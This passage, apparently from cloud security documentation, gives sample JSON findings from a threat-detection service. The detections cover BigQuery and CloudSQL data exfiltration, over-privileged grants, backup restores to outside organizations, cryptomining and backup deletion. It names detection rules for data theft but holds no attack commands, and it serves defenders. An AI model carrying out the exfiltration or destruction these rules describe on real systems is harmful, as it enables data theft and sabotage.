"FOLDER_NAME" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_NUMBER", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_NAME" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/folders/FOLDER_NUMBER/projects/PROJECT_NUMBER" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "cloud_run_cryptomining_docker_images" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//run.googleapis.com/namespaces/PROJECT_ID/services/SERVICE_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1746493531", "nanos": 417999000 }, "insertId": "INSERT_ID", "logId": "cloudaudit.googleapis.com/system_event" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1610/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} } } }
Exfiltration: BigQuery Data Exfiltration
This finding can include one of two possible subrules:
exfil_to_external_table, with a severity ofHIGH.vpc_perimeter_violation, with a severity ofLOW.
The following example shows the JSON for subrule exfil_to_external_table.
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "bigquery.googleapis.com", "methodName": "google.cloud.bigquery.v2.JobService.InsertJob" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Exfiltration: BigQuery Data Exfiltration", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "2023-05-30T15:49:59.709Z", "database": {}, "eventTime": "2023-05-30T15:49:59.432Z", "exfiltration": { "sources": [ { "name": "//bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID" } ], "targets": [ { "name": "//bigquery.googleapis.com/projects/TARGET_PROJECT_ID/datasets/TARGET_DATASET_ID/tables/TARGET_TABLE_ID" } ] }, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "EXFILTRATION", "primaryTechniques": [ "EXFILTRATION_OVER_WEB_SERVICE", "EXFILTRATION_TO_CLOUD_STORAGE" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "HIGH", "state": "ACTIVE", "vulnerability": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/folders/FOLDER_ID", "parent_display_name": "FOLDER_NAME", "type": "google.cloud.resourcemanager.Project", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_ID", "resourceFolderDisplayName": "FOLDER_NAME" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "org_exfiltration", "indicator": "audit_log", "ruleName": "big_query_exfil", "subRuleName": "exfil_to_external_table" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1685461795", "nanos": 341527000 }, "insertId": "INSERT_ID" } } ], "properties": { "dataExfiltrationAttempt": { "jobState": "SUCCEEDED", "jobLink": "https://console.cloud.google.com/bigquery?j=bq:BIGQUERY_JOB_LOCATION:BIGQUERY_JOB_ID&project=PROJECT_ID&page=queryresults", "job": { "projectId": "PROJECT_ID", "jobId": "BIGQUERY_JOB_ID", "location": "BIGQUERY_JOB_LOCATION" }, "query": "QUERY", "sourceTables": [ { "resourceUri": "https://console.cloud.google.com/bigquery?p=PROJECT_ID&d=DATASET_ID&t=TABLE_ID&page=table", "projectId": "PROJECT_ID", "datasetId": "DATASET_ID", "tableId": "TABLE_ID" } ], "destinationTables": [ { "resourceUri": "https://console.cloud.google.com/bigquery?p=TARGET_PROJECT_ID&d=TARGET_DATASET_ID&t=TARGET_TABLE_ID&page=table", "projectId": "TARGET_PROJECT_ID", "datasetId": "TARGET_DATASET_ID", "tableId": "TARGET_TABLE_ID" } ], "userEmail": "e2etest@PROJECT_ID.iam.gserviceaccount.com" }, "principalEmail": "PRINCIPAL_EMAIL" }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1567/002/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-05-30T15:49:55.341527Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID" } ], "relatedFindingUri": {} } } }
Exfiltration: BigQuery Data Extraction
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resource_name": "//bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID", "state": "ACTIVE", "category": "Exfiltration: BigQuery Data Extraction", "sourceProperties": { "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "detectionCategory": { "technique": "storage_bucket_exfiltration", "indicator": "audit_log", "ruleName": "big_query_exfil", "subRuleName": "exfil_to_cloud_storage" }, "detectionPriority": "LOW", "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1567/002/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }], "relatedFindingUri": { "displayName": "Related BigQuery Exfiltration Extraction findings", "url": "RELATED_FINDINGS_LINK" } }, "evidence": [{ "sourceLogId": { "projectId": PROJECT_ID, "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } }], "properties": { "extractionAttempt": { "jobLink": "https://console.cloud.google.com/bigquery?j=JOB_ID&project=SOURCE_PROJECT_ID&page=queryresults", "job": { "projectId": "SOURCE_PROJECT_ID", "jobId": "JOB_ID", "location": "US" }, "sourceTable": { "projectId": "DESTINATION_PROJECT_ID", "datasetId": "DATASET_ID", "tableId": "TABLE_ID", "resourceUri": "FULL_URI" }, "destinations": [ { "originalUri": "gs://TARGET_STORAGE_BUCKET_NAME/TARGET_FILE_NAME", "collectionType": "STORAGE_BUCKET", "collectionName": "TARGET_STORAGE_BUCKET_NAME", "objectName": "TARGET_FILE_NAME" } ] }, "principalEmail": "PRINCIPAL_EMAIL" }, "findingId": "FINDING_ID" }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2022-03-31T21:22:11.359Z", "createTime": "2022-03-31T21:22:12.689Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "mute": "UNDEFINED", "findingClass": "THREAT", "mitreAttack": { "primaryTactic": "EXFILTRATION", "primaryTechniques": ["EXFILTRATION_OVER_WEB_SERVICE", "EXFILTRATION_TO_CLOUD_STORAGE"] }, "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP", "callerIpGeo": { }, "serviceName": "bigquery.googleapis.com", "methodName": "google.cloud.bigquery.v2.JobService.InsertJob" }, "exfiltration": { "sources": [ { "name": "//bigquery.googleapis.com/projects/SOURCE_PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID" } ], "targets": [ { "name": "TARGET_STORAGE_URI" } ] } }, "resource": { "name": "//bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER/datasets/DATASET_ID", "parentDisplayName": "PROJECT_ID:DATASET_ID", "type": "google.cloud.bigquery.Table", "folders": [{ "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_NAME" }], "displayName": "PROJECT_ID:DATASET_ID.TABLE_ID" } }
Exfiltration: BigQuery Data to Google Drive
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resource_name": "//bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID", "state": "ACTIVE", "category": "Exfiltration: BigQuery Data to Google Drive", "sourceProperties": { "affectedResources": [{ "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }], "detectionCategory": { "technique": "google_drive_exfiltration", "indicator": "audit_log", "ruleName": "big_query_exfil", "subRuleName": "exfil_to_google_drive" }, "detectionPriority": "LOW", "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1567/002/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }], "relatedFindingUri": { "displayName": "Related BigQuery Exfiltration to Google Drive findings", "url": "RELATED_FINDINGS_LINK" } }, "evidence": [{ "sourceLogId": { "projectId": PROJECT_ID, "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } }], "properties": { "extractionAttempt": { "jobLink": "https://console.cloud.google.com/bigquery?j=JOB_ID&project=SOURCE_PROJECT_ID&page=queryresults", "job": { "projectId": "SOURCE_PROJECT_ID", "jobId": "JOB_ID", "location": "US" }, "sourceTable": { "projectId": "DESTINATION_PROJECT_ID", "datasetId": "DATASET_ID", "tableId": "TABLE_ID", "resourceUri": "FULL_URI" }, "destinations": [ { "originalUri": "gdrive://TARGET_GOOGLE_DRIVE_FOLDER/TARGET_GOOGLE_DRIVE_FILE_NAME", "collectionType": "GDRIVE", "collectionName": "TARGET_GOOGLE_DRIVE_FOLDER", "objectName": "TARGET_GOOGLE_DRIVE_FILE_NAME" } ] }, "principalEmail": "PRINCIPAL_EMAIL" }, "findingId": "FINDING_ID" }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2022-03-31T21:20:18.408Z", "createTime": "2022-03-31T21:20:18.715Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "mute": "UNDEFINED", "findingClass": "THREAT", "mitreAttack": { "primaryTactic": "EXFILTRATION", "primaryTechniques": ["EXFILTRATION_OVER_WEB_SERVICE", "EXFILTRATION_TO_CLOUD_STORAGE"] }, "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP", "callerIpGeo": { }, "serviceName": "bigquery.googleapis.com", "methodName": "google.cloud.bigquery.v2.JobService.InsertJob" }, "exfiltration": { "sources": [ { "name": "//bigquery.googleapis.com/projects/SOURCE_PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID" } ], "targets": [ { "name": "TARGET_GOOGLE_DRIVE_URI" } ] } }, "resource": { "name": "//bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER/datasets/DATASET_ID", "parentDisplayName": "PROJECT_ID:DATASET_ID", "type": "google.cloud.bigquery.Table", "folders": [{ "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_NAME" }], "displayName": "PROJECT_ID:DATASET_ID.TABLE_ID" } }
Exfiltration: CloudSQL Data Exfiltration
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resource_name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME", "state": "ACTIVE", "category": "Exfiltration: CloudSQL Data Exfiltration", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "storage_bucket_exfiltration", "indicator": "audit_log", "ruleName": "cloudsql_exfil", "subRuleName": "export_to_public_gcs" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//storage.googleapis.com/TARGET_STORAGE_BUCKET_NAME }, { "gcpResourceName": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME" } ], "evidence": [{ "sourceLogId": { "projectId": PROJECT_ID, "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } }], "properties": { "exportToGcs": { "principalEmail": "PRINCIPAL_EMAIL", "cloudsqlInstanceResource": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME", "gcsUri": "gs://TARGET_STORAGE_BUCKET_NAME/TARGET_FILE_NAME", "bucketAccess": "PUBLICLY_ACCESSIBLE", "bucketResource": "//storage.googleapis.com/TARGET_STORAGE_BUCKET_NAME", "exportScope": "WHOLE_INSTANCE" } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1567/002/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }], "relatedFindingUri": { "displayName": "Related CloudSQL Exfiltration findings", "url": "RELATED_FINDINGS_LINK" } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-10-11T16:32:59.828Z", "createTime": "2021-10-11T16:33:00.229Z", "severity": "HIGH", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" "mute": "UNDEFINED", "findingClass": "THREAT", "mitreAttack": { "primaryTactic": "EXFILTRATION", "primaryTechniques": ["EXFILTRATION_OVER_WEB_SERVICE", "EXFILTRATION_TO_CLOUD_STORAGE"] }, "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP", "callerIpGeo": { }, "serviceName": "cloudsql.googleapis.com", "methodName": "cloudsql.instances.export" }, "exfiltration": { "sources": [ { "name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME", "components": [] } ], "targets": [ { "name": "//storage.googleapis.com/TARGET_STORAGE_BUCKET_NAME", "components": [ "TARGET_FILE_NAME" ] } ] }, }, "resource": { "name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "type": "google.cloud.sql.Instance", "folders": [{ "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_NAME" }], "displayName": "INSTANCE_NAME" } }
Exfiltration: CloudSQL Over-Privileged Grant
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resource_name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME", "state": "ACTIVE", "category": "Exfiltration: CloudSQL Over-Privileged Grant", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "cloudsql_exfil", "subRuleName": "user_granted_all_permissions" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME" } ], "evidence": [{ "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } }], "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1567/002/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }], "relatedFindingUri": { "displayName": "Related CloudSQL Exfiltration findings", "url": "RELATED_FINDINGS_LINK" } } }, "eventTime": "2022-01-19T21:36:07.901Z", "createTime": "2022-01-19T21:36:08.695Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" "mute": "UNDEFINED", "findingClass": "THREAT", "mitreAttack": { "primaryTactic": "EXFILTRATION", "primaryTechniques": ["EXFILTRATION_OVER_WEB_SERVICE"] }, "database": { "displayName": "DATABASE_NAME", "userName": "USER_NAME", "query": QUERY", "grantees": [GRANTEE], }, "access": { "serviceName": "cloudsql.googleapis.com", "methodName": "cloudsql.instances.query" } }, "resource": { "name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudsql.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "type": "google.cloud.sql.Instance", "folders": [{ "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" }], "displayName": "INSTANCE_NAME" } }
Exfiltration: CloudSQL Restore Backup to External Organization
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resource_name": "//cloudsql.googleapis.com/projects/SOURCE_PROJECT_ID/instances/SOURCE_INSTANCE_NAME/backupRuns/BACKUP_ID", "state": "ACTIVE", "category": "Exfiltration: CloudSQL Restore Backup to External Organization", "sourceProperties": { "sourceId": { "projectNumber": "SOURCE_PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "backup_exfiltration", "indicator": "audit_log", "ruleName": "cloudsql_exfil", "subRuleName": "restore_to_external_instance" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/SOURCE_PROJECT_NUMBER" }, { "gcpResourceName": "//cloudsql.googleapis.com/projects/SOURCE_PROJECT_ID/instances/SOURCE_INSTANCE_NAME" }, { "gcpResourceName": "//cloudsql.googleapis.com/projects/TARGET_PROJECT_ID/instances/TARGET_INSTANCE_NAME" }, ], "evidence": [{ "sourceLogId": { "projectId": "SOURCE_PROJECT_ID", "resourceContainer": "projects/SOURCE_PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } }], "properties": { "restoreToExternalInstance": { "principalEmail": "PRINCIPAL_EMAIL", "sourceCloudsqlInstanceResource": "//cloudsql.googleapis.com/projects/SOURCE_PROJECT_ID/instances/SOURCE_INSTANCE_NAME", "backupId": "BACKUP_ID", "targetCloudsqlInstanceResource": "//cloudsql.googleapis.com/projects/TARGET_PROJECT_ID/instances/TARGET_INSTANCE_NAME" } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1567/002/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }], "relatedFindingUri": { "displayName": "Related CloudSQL Exfiltration findings", "url": "RELATED_FINDINGS_LINK" } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2022-01-19T21:36:07.901Z", "createTime": "2022-01-19T21:36:08.695Z", "severity": "HIGH", "workflowState": "NEW", "canonicalName": "projects/SOURCE_PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" "mute": "UNDEFINED", "findingClass": "THREAT", "mitreAttack": { "primaryTactic": "EXFILTRATION", "primaryTechniques": ["EXFILTRATION_OVER_WEB_SERVICE", "EXFILTRATION_TO_CLOUD_STORAGE"] }, "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP", "callerIpGeo": { }, "serviceName": "cloudsql.googleapis.com", "methodName": "cloudsql.instances.restoreBackup" }, "exfiltration": { "sources": [ { "name": "//cloudsql.googleapis.com/projects/SOURCE_PROJECT_ID/instances/SOURCE_INSTANCE_NAME" } ], "targets": [ { "name": "//cloudsql.googleapis.com/projects/TARGET_PROJECT_ID/instances/TARGET_INSTANCE_NAME" } ] } }, "resource": { "name": "//cloudsql.googleapis.com/projects/SOURCE_PROJECT_ID/instances/SOURCE_INSTANCE_NAME/backupRuns/BACKUP_ID", "projectName": "//cloudresourcemanager.googleapis.com/projects/SOURCE_PROJECT_NUMBER", "projectDisplayName": "SOURCE_PROJECT_ID", "parentName": "//cloudsql.googleapis.com/projects/SOURCE_PROJECT_ID/instances/SOURCE_INSTANCE_NAME", "parentDisplayName": "SOURCE_INSTANCE_NAME", "type": "google.cloud.sql.Instance", "folders": [{ "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" }], "displayName": "mysql-backup-restore-instance" } }
Impact: Cryptomining Commands
{ "finding": { "access": { "callerIpGeo": {}, "serviceName": "run.googleapis.com", "methodName": "/Jobs.CreateJob" }, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/global/findings/FINDING_ID", "category": "Impact: Cryptomining Commands", "chokepoint": {}, "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "imageId": "CONTAINER_IMAGE_ID", "labels": [ { "name": "command", "value": "getblockchaininfo" } ], "createTime": "1970-01-01T00:00:00Z" } ], "createTime": "2025-05-06T01:19:09.854Z", "database": {}, "dataProtectionKeyGovernance": {}, "eventTime": "2025-05-06T01:19:08.853Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "logEntries": [ { "cloudLoggingEntry": { "insertId": "INSERT_ID", "logId": "cloudaudit.googleapis.com/system_event", "resourceContainer": "projects/PROJECT_ID", "timestamp": "2025-05-06T01:18:02.533391Z" } } ], "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "RESOURCE_HIJACKING" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "securityPosture": {}, "severity": "HIGH", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "displayName": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "cloudresourcemanager.googleapis.com", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "parentDisplayName": "FOLDER_NAME", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_NAME" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_NUMBER", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_NAME" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/folders/FOLDER_NUMBER/projects/PROJECT_NUMBER" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "cloud_run_jobs_cryptomining_commands" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//run.googleapis.com/namespaces/PROJECT_ID/jobs/JOB_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1746494282", "nanos": 533391000 }, "insertId": "INSERT_ID", "logId": "cloudaudit.googleapis.com/system_event" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1496/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} } } }
Impact: Deleted Google Cloud Backup and DR Backup
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "CALLER_IP", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "google.cloud.backupdr.v1.BackupDR.DeleteBackup", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Deleted Google Cloud Backup and DR Backup", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "A backup stored in a backup vault has been manually deleted. The backup was stored in REGION", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "DATA_DESTRUCTION" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_delete_vault_backup" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER/locations/REGION/backupVaults/VAULT_ID/dataSources/DATA_SOURCE_NAME/backups/BACKUP_ID" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1485/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud 